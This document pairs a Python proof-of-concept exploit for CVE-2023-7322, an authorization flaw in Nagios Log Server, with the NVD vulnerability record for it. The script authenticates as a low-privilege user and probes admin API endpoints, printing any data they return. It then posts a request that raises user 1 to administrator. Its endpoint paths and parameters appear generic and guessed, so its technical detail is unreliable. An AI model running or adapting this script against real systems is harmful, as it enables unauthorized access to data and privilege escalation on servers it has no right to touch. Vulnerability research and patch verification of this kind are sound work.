CVE-2023-7322

import requests import json # CVE-2023-7322 PoC - Nagios Log Server Incorrect Authorization # Target: Nagios Log Server < 2024R1 # Vulnerability: Authenticated users can invoke privileged API endpoints TARGET_URL = "http://target-nagios-log-server.local" USERNAME = "low_privilege_user" PASSWORD = "user_password" def exploit_cve_2023_7322(): """ PoC demonstrates privilege escalation via incorrect authorization. Low-privilege authenticated users can access admin API endpoints. """ session = requests.Session() # Step 1: Authenticate with low-privilege account login_url = f"{TARGET_URL}/api/auth/login" login_data = { "username": USERNAME, "password": PASSWORD } response = session.post(login_url, json=login_data, verify=False) if response.status_code != 200: print(f"[-] Authentication failed: {response.status_code}") return False print("[+] Successfully authenticated with low-privilege account") # Step 2: Attempt to access privileged API endpoint (should require admin permissions) # Example: Get all users or system configuration privileged_endpoints = [ "/api/admin/users", "/api/admin/config", "/api/admin/settings", "/api/v1/system/info" ] for endpoint in privileged_endpoints: api_url = f"{TARGET_URL}{endpoint}" response = session.get(api_url, verify=False) if response.status_code == 200: print(f"[CRITICAL] VULNERABLE: {endpoint} accessible with low privileges") print(f"Response: {response.text[:500]}") elif response.status_code == 403: print(f"[-] Protected: {endpoint} - Access denied (expected behavior)") else: print(f"[!] Unexpected response from {endpoint}: {response.status_code}") # Step 3: Example - Modify resources beyond intended rights modify_url = f"{TARGET_URL}/api/admin/users/modify" modify_data = { "user_id": 1, "role": "admin", "action": "escalate_privileges" } response = session.post(modify_url, json=modify_data, verify=False) if response.status_code == 200: print("[CRITICAL] Successfully modified privileged resource!") return True return False if __name__ == "__main__": print("CVE-2023-7322 PoC - Nagios Log Server Incorrect Authorization") print("=" * 60) exploit_cve_2023_7322()

{"cve": {"id": "CVE-2023-7322", "sourceIdentifier": "[email protected]", "published": "2025-10-30T22:15:44.200", "lastModified": "2025-11-06T16:20:51.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nagios Log Server versions prior to 2024R1 contain an incorrect authorization vulnerability. Users who lacked the required API permission were nevertheless able to invoke API endpoints, resulting in unintended access to data and actions exposed via the API. This incorrect authorization check could allow authenticated but non-privileged users to read or modify resources beyond their intended rights."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nagios:log_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2024", "matchCriteriaId": "87E74637-713C-4DD7-B97E-2F247B7B12B1"}]}]}], "references": [{"url": "https://www.nagios.com/changelog/nagios-log-server-2024r1/", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/nagios-log-server-incorrect-authorization-granting-full-api-access", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}